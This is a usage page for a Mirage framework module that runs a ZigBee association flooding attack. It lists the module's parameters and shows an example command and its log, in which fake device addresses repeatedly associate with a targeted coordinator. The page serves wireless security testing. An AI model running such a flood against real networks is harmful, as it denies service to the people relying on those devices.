zigbee_floodassoc

Presentation

zigbee_floodassoc performs an association flooding attack. It allows to configure the targeted PanID (TARGET_PANID parameter), the targeted channel (CHANNEL parameter) and the targeted device (TARGET parameter).

Compatible devices

Input parameters

Name

Default value

Possible values

Description

INTERFACE

rzusbstick0

rzusbstickX

Interface to use

TARGET_PANID

0x1234

<hexadecimal, 2 bytes>

Targeted PanID

CHANNEL

13

<channel number>

Targeted channel

TARGET

<ZigBee address>

Targeted device

Output parameters

This module doesn’t provide any output parameters.

Usage

To perform an Association Flooding Attack, type the following command:

$ mirage zigbee_floodassoc CHANNEL=12 TARGET_PANID=0x3332 TARGET=0x13A200405DBCFB
[INFO] Module zigbee_floodassoc loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
[INFO] PanID selected: 0x3332
[INFO] Coordinator selected: 00:13:A2:00:40:5D:BC:FB
[INFO] New address: 0xC854
[INFO] New address: 0xDCA1
[INFO] New address: 0xAB88
[INFO] New address: 0xFF61
[INFO] New address: 0x03F0
[INFO] New address: 0x0069
[INFO] New address: 0xB07E
[INFO] New address: 0x2004
^C[INFO] Mirage process terminated !